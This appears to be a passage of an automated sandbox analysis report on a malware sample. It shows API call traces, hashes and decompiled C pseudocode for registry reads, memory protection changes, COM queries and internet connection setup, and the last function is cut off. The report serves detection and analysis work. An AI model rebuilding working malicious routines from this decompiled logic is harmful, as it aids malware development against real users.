                                                              • Part of subcall function 6E4B109B: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E4B10BE
                                                              • Part of subcall function 6E4B109B: _snwprintf.NTDLL ref: 6E4B10E3
                                                              • Part of subcall function 6E4B109B: CreateFileMappingW.KERNELBASE(000000FF,6E4B41C0,00000004,00000000,?,?), ref: 6E4B1108
                                                              • Part of subcall function 6E4B109B: GetLastError.KERNEL32 ref: 6E4B111F
                                                              • Part of subcall function 6E4B109B: CloseHandle.KERNEL32(00000000), ref: 6E4B1154
                                                            • ExitThread.KERNEL32 ref: 6E4B1D8F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
                                                            • String ID:
                                                            • API String ID: 4209869662-0
                                                            • Opcode ID: d1daa7aeb64feb96a8fb16023668893d184f6604b01d1f4d3c3fc3d9ff6689de
                                                            • Instruction ID: f1fdb1f9aa856ccdf32f1903591e4f4dcf414ef2b8e02dca43ca75ff0d750a45
                                                            • Opcode Fuzzy Hash: d1daa7aeb64feb96a8fb16023668893d184f6604b01d1f4d3c3fc3d9ff6689de
                                                            • Instruction Fuzzy Hash: 37119D72914605AFDB01EBB9DC48E8B77ECAF4A784F010A1AF550D7250E730F5098BA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04581736: RegCreateKeyA.ADVAPI32(80000001,049BA7F0,?), ref: 0458174B
                                                              • Part of subcall function 04581736: lstrlen.KERNEL32(049BA7F0,00000000,00000000,00000000,?,045768CE,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD,?,04575AB0), ref: 04581774
                                                            • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000000,00000001,?,00000001,00000000), ref: 04579E68
                                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,00000010), ref: 04579E9A
                                                            • RegCloseKey.ADVAPI32(?), ref: 04579EBC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Value$CloseCreateQuerylstrlen
                                                            • String ID:
                                                            • API String ID: 2552977122-0
                                                            • Opcode ID: 700371d882489ed3342f09bf8d3031dec42c54f371a66fddd93dc0963a570309
                                                            • Instruction ID: 97446c38840ba007ea565b89541371e0e4f7481b6cdd2790892ed9d3dbaeaaeb
                                                            • Opcode Fuzzy Hash: 700371d882489ed3342f09bf8d3031dec42c54f371a66fddd93dc0963a570309
                                                            • Instruction Fuzzy Hash: 8811FB75900219EFEF10DFA5EC45BEEBBB8FB44715F101069E901B3150DB74AA49EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00DD3B34(void* __ecx, void* __eflags) {
                                                            				char _v8;
                                                            				void* _v12;
                                                            				int _v16;
                                                            				int _v20;
                                                            				intOrPtr _t15;
                                                            				intOrPtr _t19;
                                                            				long _t24;
                                                            				long _t29;
                                                            				short* _t31;
                                                            				short* _t34;
                                                            
                                                            				_t15 =  *0xdda2d4; // 0x2bed5a8
                                                            				_v8 = _v8 & 0x00000000;
                                                            				_t3 = _t15 + 0xddba40; // 0x4f0053
                                                            				_v16 = 4;
                                                            				_t31 = E00DD1440(__ecx, _t3);
                                                            				if(_t31 != 0) {
                                                            					_t19 =  *0xdda2d4; // 0x2bed5a8
                                                            					_t5 = _t19 + 0xddba9c; // 0x6e0049
                                                            					_t34 = E00DD1440(__ecx, _t5);
                                                            					if(_t34 != 0) {
                                                            						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
                                                            						if(_t24 == 0) {
                                                            							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
                                                            							if(_t29 != 0) {
                                                            								_v8 = _v8 & 0x00000000;
                                                            							}
                                                            							RegCloseKey(_v12);
                                                            						}
                                                            						E00DD77EC(_t34);
                                                            					}
                                                            					E00DD77EC(_t31);
                                                            				}
                                                            				return _v8;
                                                            			}
                                                            0x00dd3b3a
                                                            0x00dd3b3f
                                                            0x00dd3b44
                                                            0x00dd3b4b
                                                            0x00dd3b57
                                                            0x00dd3b5b
                                                            0x00dd3b5d
                                                            0x00dd3b63
                                                            0x00dd3b6f
                                                            0x00dd3b73
                                                            0x00dd3b86
                                                            0x00dd3b8e
                                                            0x00dd3ba2
                                                            0x00dd3baa
                                                            0x00dd3bac
                                                            0x00dd3bac
                                                            0x00dd3bb3
                                                            0x00dd3bb3
                                                            0x00dd3bba
                                                            0x00dd3bba
                                                            0x00dd3bc0
                                                            0x00dd3bc5
                                                            0x00dd3bcb

                                                            APIs
                                                              • Part of subcall function 00DD1440: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00DD3B57,004F0053,00000000,?), ref: 00DD1449
                                                              • Part of subcall function 00DD1440: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00DD3B57,004F0053,00000000,?), ref: 00DD1473
                                                              • Part of subcall function 00DD1440: memset.NTDLL ref: 00DD1487
                                                            • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 00DD3B86
                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 00DD3BA2
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00DD3BB3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: CloseOpenQueryValuelstrlenmemcpymemset
                                                            • String ID:
                                                            • API String ID: 830012212-0
                                                            • Opcode ID: 4acc60b3f5a98cef331f2a002a4165a4521190028eaa99de1db989ceaf4c385a
                                                            • Instruction ID: 758230bd0790260809019b087fce3485d61f8dce4457392ccf66d4e75bf2077e
                                                            • Opcode Fuzzy Hash: 4acc60b3f5a98cef331f2a002a4165a4521190028eaa99de1db989ceaf4c385a
                                                            • Instruction Fuzzy Hash: C7113976500209BBDB11DBE8CC85FAF77BCEB04304F15449BA201E7252EB70AA089B71
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(00000402,?,?,?,?,0457A836,0458B7A4,?,?,00000402,0457C495,04588570,00000018,0456A0D1,?,00000402), ref: 04570D01
                                                            • VirtualProtect.KERNELBASE(00000402,00000004,00000040,00000000,0458B7A4,?,?,?,?,0457A836,0458B7A4,?,?,00000402,0457C495,04588570), ref: 04570D1B
                                                            • VirtualProtect.KERNELBASE(00000402,00000004,00000000,00000000,?,?,?,0457A836,0458B7A4,?,?,00000402,0457C495,04588570,00000018,0456A0D1), ref: 04570D4E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ProtectVirtual$lstrlen
                                                            • String ID:
                                                            • API String ID: 386137988-0
                                                            • Opcode ID: b95f326f79f8749ba57332ac1ac43f3b4b382f05acbc21f1b52a30acf5d0afc8
                                                            • Instruction ID: b420d5ffd5d08b93ae2805c51234b0bb2b06a90ac66e400f75820ba2f7c00680
                                                            • Opcode Fuzzy Hash: b95f326f79f8749ba57332ac1ac43f3b4b382f05acbc21f1b52a30acf5d0afc8
                                                            • Instruction Fuzzy Hash: 17111C75900308FFEB11CF45E485F9EBBB8FF04B55F108059ED059A251D7B8EA44ABA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegCreateKeyA.ADVAPI32(80000001,049BA7F0,?), ref: 0458174B
                                                            • RegOpenKeyA.ADVAPI32(80000001,049BA7F0,?), ref: 04581755
                                                            • lstrlen.KERNEL32(049BA7F0,00000000,00000000,00000000,?,045768CE,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD,?,04575AB0), ref: 04581774
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CreateOpenlstrlen
                                                            • String ID:
                                                            • API String ID: 2865187142-0
                                                            • Opcode ID: 4d63cb87455ee4b9a267deb331fbe0fae9607c7cfe28c0276b9ff226e4e8dcd1
                                                            • Instruction ID: e078c83e1a546caae7b3fe19e05622087a77c2a1a1a7a72db2568ed857b339a0
                                                            • Opcode Fuzzy Hash: 4d63cb87455ee4b9a267deb331fbe0fae9607c7cfe28c0276b9ff226e4e8dcd1
                                                            • Instruction Fuzzy Hash: 6DF09676100208BFEB11AF90EC84FEA7B7CFB85365F10401DFE46E5240EA74AA45D7A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetEvent.KERNEL32(000003BC,0456D1D5), ref: 04583A7A
                                                              • Part of subcall function 04566975: SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,04583A85), ref: 0456699E
                                                              • Part of subcall function 04566975: RtlDeleteCriticalSection.NTDLL(0458C2E0), ref: 045669D1
                                                              • Part of subcall function 04566975: RtlDeleteCriticalSection.NTDLL(0458C300), ref: 045669D8
                                                              • Part of subcall function 04566975: CloseHandle.KERNEL32(?,?,04583A85), ref: 04566A07
                                                              • Part of subcall function 04566975: ReleaseMutex.KERNEL32(0000045C,00000000,?,?,?,04583A85), ref: 04566A18
                                                              • Part of subcall function 04566975: CloseHandle.KERNEL32(?,?,04583A85), ref: 04566A24
                                                              • Part of subcall function 04566975: ResetEvent.KERNEL32(00000000,00000000,?,?,?,04583A85), ref: 04566A30
                                                              • Part of subcall function 04566975: CloseHandle.KERNEL32(?,?,04583A85), ref: 04566A3C
                                                              • Part of subcall function 04566975: SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,04583A85), ref: 04566A42
                                                              • Part of subcall function 04566975: SleepEx.KERNEL32(00000064,00000001,?,?,04583A85), ref: 04566A56
                                                              • Part of subcall function 04566975: HeapFree.KERNEL32(00000000,00000000,?,?,04583A85), ref: 04566A79
                                                              • Part of subcall function 04566975: RtlRemoveVectoredExceptionHandler.NTDLL(01348118), ref: 04566AB2
                                                            • CloseHandle.KERNEL32(000003BC), ref: 04583A8F
                                                            • HeapDestroy.KERNELBASE(045C0000), ref: 04583A9F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseHandle$Sleep$CriticalDeleteEventHeapSection$DestroyExceptionFreeHandlerMutexReleaseRemoveResetVectored
                                                            • String ID:
                                                            • API String ID: 1636361345-0
                                                            • Opcode ID: 708a53c89ac8b5c74f2c3119d124cd08a64fd16c93d24ae47cced0415b5670ec
                                                            • Instruction ID: 9f2307f2d0d786ad8a1da2776b56abe827bbf9144b51af0ef1c06e8277a1e019
                                                            • Opcode Fuzzy Hash: 708a53c89ac8b5c74f2c3119d124cd08a64fd16c93d24ae47cced0415b5670ec
                                                            • Instruction Fuzzy Hash: 0FE04270700202DBAB10AF75F88CA1637ACFA05A41344641CB951F7144EE2AE808BA29
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00DD642D(void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                            				int _v12;
                                                            				signed int _v16;
                                                            				void* _v20;
                                                            				signed char _v36;
                                                            				void* _t24;
                                                            				intOrPtr _t27;
                                                            				void* _t35;
                                                            				signed int _t38;
                                                            				signed char* _t46;
                                                            				int _t53;
                                                            				void* _t55;
                                                            				void* _t56;
                                                            				void* _t57;
                                                            
                                                            				_v16 = _v16 & 0x00000000;
                                                            				_t46 = _a4;
                                                            				_t53 = ( *_t46 & 0x000000ff) + 0x110;
                                                            				_v12 = 0x110;
                                                            				_t24 = E00DD77D7(_t53);
                                                            				_a4 = _t24;
                                                            				if(_t24 != 0) {
                                                            					memcpy(_t24,  *0xdda324, 0x110);
                                                            					_t27 =  *0xdda328; // 0x0
                                                            					_t57 = _t56 + 0xc;
                                                            					if(_t27 != 0) {
                                                            						_t51 = _a4;
                                                            						E00DD1C69(0x110, _a4, _a4, _t27, 0);
                                                            					}
                                                            					if(E00DD60EB( &_v36) != 0) {
                                                            						_t35 = E00DD3FAB(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
                                                            						if(_t35 == 0) {
                                                            							_t55 = _v20;
                                                            							_v36 =  *_t46;
                                                            							_t38 = E00DD3612(_t55, _a8, _t51, _t46, _a12); // executed
                                                            							_v16 = _t38;
                                                            							 *(_t55 + 4) = _v36;
                                                            							_t20 =  &(_t46[4]); // 0x8b4875fc
                                                            							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
                                                            							_t57 = _t57 + 0xc;
                                                            							E00DD77EC(_t55);
                                                            						}
                                                            					}
                                                            					memset(_a4, 0, _t53);
                                                            					E00DD77EC(_a4);
                                                            				}
                                                            				return _v16;
                                                            			}
                                                            0x00dd6433
                                                            0x00dd6438
                                                            0x00dd6445
                                                            0x00dd6448
                                                            0x00dd644b
                                                            0x00dd6452
                                                            0x00dd6455
                                                            0x00dd6463
                                                            0x00dd6468
                                                            0x00dd646d
                                                            0x00dd6472
                                                            0x00dd6474
                                                            0x00dd647d
                                                            0x00dd647d
                                                            0x00dd648c
                                                            0x00dd64a1
                                                            0x00dd64a8
                                                            0x00dd64af
                                                            0x00dd64b5
                                                            0x00dd64bb
                                                            0x00dd64c3
                                                            0x00dd64c9
                                                            0x00dd64cc
                                                            0x00dd64d9
                                                            0x00dd64de
                                                            0x00dd64e2
                                                            0x00dd64e2
                                                            0x00dd64a8
                                                            0x00dd64ed
                                                            0x00dd64f8
                                                            0x00dd64f8
                                                            0x00dd6504

                                                            APIs
                                                              • Part of subcall function 00DD77D7: RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                            • memcpy.NTDLL(00000000,00000110,00DD6E08,00DD6E08,?,?,00DD6E08,?,?,00DD308E,?), ref: 00DD6463
                                                            • memset.NTDLL ref: 00DD64D9
                                                            • memset.NTDLL ref: 00DD64ED
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: memset$AllocateHeapmemcpy
                                                            • String ID:
                                                            • API String ID: 1529149438-0
                                                            • Opcode ID: 43824ec4a10285dfa387d58cc3b715281eb35e824ab21a388e42f99f095f7950
                                                            • Instruction ID: 6851a74691ad6c1c0811a0956972aba7f50350fc9ff399bf83c1d9536ad19d5e
                                                            • Opcode Fuzzy Hash: 43824ec4a10285dfa387d58cc3b715281eb35e824ab21a388e42f99f095f7950
                                                            • Instruction Fuzzy Hash: B921EB75A00218BBDB11AFA5CC41FAEBBB8EF48750F048066F904E6352E734DA05CBB5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 38%
                                                            			E00DD740B(intOrPtr _a4) {
                                                            				void* _v12;
                                                            				void* _v16;
                                                            				void* _v20;
                                                            				void* _v24;
                                                            				void* _v28;
                                                            				char _v32;
                                                            				intOrPtr _v40;
                                                            				void* _v46;
                                                            				short _v48;
                                                            				intOrPtr _t49;
                                                            				void* _t51;
                                                            				intOrPtr* _t53;
                                                            				intOrPtr _t56;
                                                            				void* _t58;
                                                            				intOrPtr* _t59;
                                                            				intOrPtr* _t61;
                                                            				intOrPtr* _t63;
                                                            				intOrPtr* _t65;
                                                            				intOrPtr* _t67;
                                                            				intOrPtr* _t69;
                                                            				intOrPtr* _t71;
                                                            				intOrPtr* _t73;
                                                            				intOrPtr _t76;
                                                            				intOrPtr* _t79;
                                                            				short _t81;
                                                            				char* _t97;
                                                            				intOrPtr _t99;
                                                            				void* _t105;
                                                            				void* _t107;
                                                            				intOrPtr _t111;
                                                            
                                                            				_t81 = 0;
                                                            				_v48 = 0;
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				asm("stosw");
                                                            				_t49 =  *0xdda2d4; // 0x2bed5a8
                                                            				_t4 = _t49 + 0xddb448; // 0x39c89f0
                                                            				_t5 = _t49 + 0xddb438; // 0x9ba05972
                                                            				_t51 =  *0xdda140(_t5, 0, 4, _t4,  &_v20); // executed
                                                            				_t105 = _t51;
                                                            				if(_t105 >= 0) {
                                                            					_t53 = _v20;
                                                            					_push( &_v12);
                                                            					_push(1);
                                                            					_push( &_v32);
                                                            					_push(8);
                                                            					_t97 =  &_v48;
                                                            					_push(_t97);
                                                            					_push(_t97);
                                                            					_push(_t53); // executed
                                                            					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
                                                            						_t56 =  *0xdda2d4; // 0x2bed5a8
                                                            						_t30 = _t56 + 0xddb428; // 0x39c89d0
                                                            						_t31 = _t56 + 0xddb458; // 0x4c96be40
                                                            						_t58 =  *0xdda114(_v12, _t31, _t30,  &_v24); // executed
                                                            						_t105 = _t58;
                                                            						_t59 = _v12;
                                                            						 *((intOrPtr*)( *_t59 + 8))(_t59);
                                                            						goto L11;
                                                            					} else {
                                                            						_t71 = _v20;
                                                            						_v16 = 0;
                                                            						_t105 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
                                                            						if(_t105 >= 0) {
                                                            							_t111 = _v16;
                                                            							if(_t111 == 0) {
                                                            								_t105 = 0x80004005;
                                                            								goto L11;
                                                            							} else {
                                                            								if(_t111 <= 0) {
                                                            									L11:
                                                            									if(_t105 >= 0) {
                                                            										goto L12;
                                                            									}
                                                            								} else {
                                                            									do {
                                                            										_t73 = _v20;
                                                            										_v48 = 3;
                                                            										_v40 = _t81;
                                                            										_t107 = _t107 - 0x10;
                                                            										asm("movsd");
                                                            										asm("movsd");
                                                            										asm("movsd");
                                                            										asm("movsd");
                                                            										_t105 =  *((intOrPtr*)( *_t73 + 0x20))(_t73,  &_v12);
                                                            										if(_t105 < 0) {
                                                            											goto L7;
                                                            										} else {
                                                            											_t76 =  *0xdda2d4; // 0x2bed5a8
                                                            											_t23 = _t76 + 0xddb428; // 0x39c89d0
                                                            											_t24 = _t76 + 0xddb458; // 0x4c96be40
                                                            											_t105 =  *0xdda114(_v12, _t24, _t23,  &_v24);
                                                            											_t79 = _v12;
                                                            											 *((intOrPtr*)( *_t79 + 8))(_t79);
                                                            											if(_t105 >= 0) {
                                                            												L12:
                                                            												_t63 = _v24;
                                                            												_t105 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
                                                            												if(_t105 >= 0) {
                                                            													_t99 =  *0xdda2d4; // 0x2bed5a8
                                                            													_t67 = _v28;
                                                            													_t40 = _t99 + 0xddb418; // 0x214e3
                                                            													_t105 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
                                                            													_t69 = _v28;
                                                            													 *((intOrPtr*)( *_t69 + 8))(_t69);
                                                            												}
                                                            												_t65 = _v24;
                                                            												 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                            											} else {
                                                            												goto L7;
                                                            											}
                                                            										}
                                                            										goto L15;
                                                            										L7:
                                                            										_t81 = _t81 + 1;
                                                            									} while (_t81 < _v16);
                                                            									goto L11;
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					L15:
                                                            					_t61 = _v20;
                                                            					 *((intOrPtr*)( *_t61 + 8))(_t61);
                                                            				}
                                                            				return _t105;
                                                            			}

                                                            APIs
                                                            • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,039C89D0,00DD19E4,?,?,?,?,?,?,?,?,?,?,?,00DD19E4), ref: 00DD74D7
                                                            • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,039C89D0,00DD19E4,?,?,?,?,?,?,?,00DD19E4,00000000,00000000,00000000,006D0063), ref: 00DD7515
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: QueryServiceUnknown_
                                                            • String ID:
                                                            • API String ID: 2042360610-0
                                                            • Opcode ID: dc42c00fae24b9eb6ca216c969d3e23d702a23c91a51b16bffbb7effc0078a22
                                                            • Instruction ID: bc6ff7c1ac231f9285a734a01668c46a9bbe0ee827f7d6cdd9eeada3bd5d116f
                                                            • Opcode Fuzzy Hash: dc42c00fae24b9eb6ca216c969d3e23d702a23c91a51b16bffbb7effc0078a22
                                                            • Instruction Fuzzy Hash: 71511075900219AFCB00DFE8C888DAEB7B9FF48714B05859AE905EB351E731AD45CBB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 21%
                                                            			E00DD6F10(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
                                                            				intOrPtr _v8;
                                                            				char _v12;
                                                            				signed int _t37;
                                                            				long _t39;
                                                            				long _t40;
                                                            				signed int _t41;
                                                            				intOrPtr _t42;
                                                            				signed int _t43;
                                                            				intOrPtr _t44;
                                                            				intOrPtr _t45;
                                                            				intOrPtr _t46;
                                                            				intOrPtr _t48;
                                                            				void* _t65;
                                                            				intOrPtr* _t67;
                                                            				intOrPtr* _t68;
                                                            				void* _t71;
                                                            
                                                            				_t68 = __esi;
                                                            				_t65 = E00DD5691(_t37, _a4);
                                                            				if(_t65 == 0) {
                                                            					L18:
                                                            					_t39 = GetLastError();
                                                            				} else {
                                                            					_t40 = GetVersion();
                                                            					_t71 = _t40 - 6;
                                                            					if(_t71 > 0 || _t71 == 0 && _t40 > 2) {
                                                            						_a4 = 4;
                                                            					} else {
                                                            						_a4 = 0;
                                                            					}
                                                            					__imp__(_t65, _a4, 0, 0, 0); // executed
                                                            					 *(_t68 + 0x10) = _t40;
                                                            					_t41 = E00DD77EC(_t65);
                                                            					if( *(_t68 + 0x10) == 0) {
                                                            						goto L18;
                                                            					} else {
                                                            						_t42 = E00DD5691(_t41,  *_t68);
                                                            						_v8 = _t42;
                                                            						if(_t42 == 0) {
                                                            							goto L18;
                                                            						} else {
                                                            							_t67 = __imp__; // 0x6f54f5a0
                                                            							if(_a8 == 0) {
                                                            								L10:
                                                            								__imp__( *(_t68 + 0x10), _v8, 0x50, 0);
                                                            								 *((intOrPtr*)(_t68 + 0x14)) = _t42;
                                                            								_t43 = E00DD77EC(_v8);
                                                            								if( *((intOrPtr*)(_t68 + 0x14)) == 0) {
                                                            									goto L18;
                                                            								} else {
                                                            									_a4 = 0x100;
                                                            									_t44 = E00DD5691(_t43,  *((intOrPtr*)(_t68 + 4)));
                                                            									_v8 = _t44;
                                                            									if(_t44 == 0) {
                                                            										goto L18;
                                                            									} else {
                                                            										_t45 =  *0xdda2d4; // 0x2bed5a8
                                                            										_t21 = _t45 + 0xddb76c; // 0x450047
                                                            										_t46 = _t21;
                                                            										__imp__( *((intOrPtr*)(_t68 + 0x14)), _t46, _v8, 0, 0, 0, _a4);
                                                            										 *((intOrPtr*)(_t68 + 0x18)) = _t46;
                                                            										E00DD77EC(_v8);
                                                            										_t48 =  *((intOrPtr*)(_t68 + 0x18));
                                                            										if(_t48 == 0) {
                                                            											goto L18;
                                                            										} else {
                                                            											_v12 = 4;
                                                            											__imp__(_t48, 0x1f,  &_a4,  &_v12);
                                                            											if(_t48 != 0) {
                                                            												_a4 = _a4 | 0x00000100;
                                                            												 *_t67( *((intOrPtr*)(_t68 + 0x18)), 0x1f,  &_a4, 4);
                                                            											}
                                                            											_push(4);
                                                            											_push( &_a8);
                                                            											_push(6);
                                                            											_push( *((intOrPtr*)(_t68 + 0x18)));
                                                            											if( *_t67() == 0) {
                                                            												goto L18;
                                                            											} else {
                                                            												_push(4);
                                                            												_push( &_a8);
                                                            												_push(5);
                                                            												_push( *((intOrPtr*)(_t68 + 0x18)));
                                                            												if( *_t67() == 0) {
                                                            													goto L18;
                                                            												} else {
                                                            													_t39 = 0;
                                                            												}
                                                            											}
                                                            										}
                                                            									}
                                                            								}
                                                            							} else {
                                                            								_t42 =  *_t67( *(_t68 + 0x10), 3,  &_a8, 4);
                                                            								if(_t42 == 0) {
                                                            									goto L18;
                                                            								} else {
                                                            									goto L10;
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				return _t39;
                                                            			}

                                                            APIs
                                                              • Part of subcall function 00DD5691: lstrlen.KERNEL32(?,00000000,039C9D00,745EC740,00DD291A,039C9F05,00DD5FB9,00DD5FB9,?,00DD5FB9,?,69B25F44,E8FA7DD7,00000000), ref: 00DD5698
                                                              • Part of subcall function 00DD5691: mbstowcs.NTDLL ref: 00DD56C1
                                                              • Part of subcall function 00DD5691: memset.NTDLL ref: 00DD56D3
                                                            • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,00DD6A09,73BB81D0,00000000,039C9698,?,?,00DD3771,?,039C9698,0000EA60), ref: 00DD6F2B
                                                            • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,00DD6A09,73BB81D0,00000000,039C9698,?,?,00DD3771,?,039C9698,0000EA60), ref: 00DD705B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                                                            • String ID:
                                                            • API String ID: 4097109750-0
                                                            • Opcode ID: 9259c47e2e4245ca70d34f01a3fc37c3abf10607b3d0da8e1f8a34ae3a1bbc9d
                                                            • Instruction ID: 456f048695fd29fe422e9b1d5160654c4d5100311892c5534c9a6cb1e395e880
                                                            • Opcode Fuzzy Hash: 9259c47e2e4245ca70d34f01a3fc37c3abf10607b3d0da8e1f8a34ae3a1bbc9d
                                                            • Instruction Fuzzy Hash: 04413B71500309BFEB20AFA0DC85EBA7BB9EB04740F14456BB645962A1E771EA44DBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 75%
                                                            			E00DD18B7(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                            				void* _v8;
                                                            				void* __esi;
                                                            				intOrPtr* _t35;
                                                            				void* _t40;
                                                            				intOrPtr* _t41;
                                                            				intOrPtr* _t43;
                                                            				intOrPtr* _t45;
                                                            				intOrPtr* _t50;
                                                            				intOrPtr* _t52;
                                                            				void* _t54;
                                                            				intOrPtr* _t55;
                                                            				intOrPtr* _t57;
                                                            				intOrPtr* _t61;
                                                            				intOrPtr* _t65;
                                                            				intOrPtr _t68;
                                                            				void* _t72;
                                                            				void* _t75;
                                                            				void* _t76;
                                                            
                                                            				_t55 = _a4;
                                                            				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                            				_a4 = 0;
                                                            				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                            				if(_t76 < 0) {
                                                            					L18:
                                                            					return _t76;
                                                            				}
                                                            				_t40 = E00DD56E3(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                            				_t76 = _t40;
                                                            				if(_t76 >= 0) {
                                                            					_t61 = _a28;
                                                            					if(_t61 != 0 &&  *_t61 != 0) {
                                                            						_t52 = _v8;
                                                            						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                            					}
                                                            					if(_t76 >= 0) {
                                                            						_t43 =  *_t55;
                                                            						_t68 =  *0xdda2d4; // 0x2bed5a8
                                                            						_t20 = _t68 + 0xddb1fc; // 0x740053
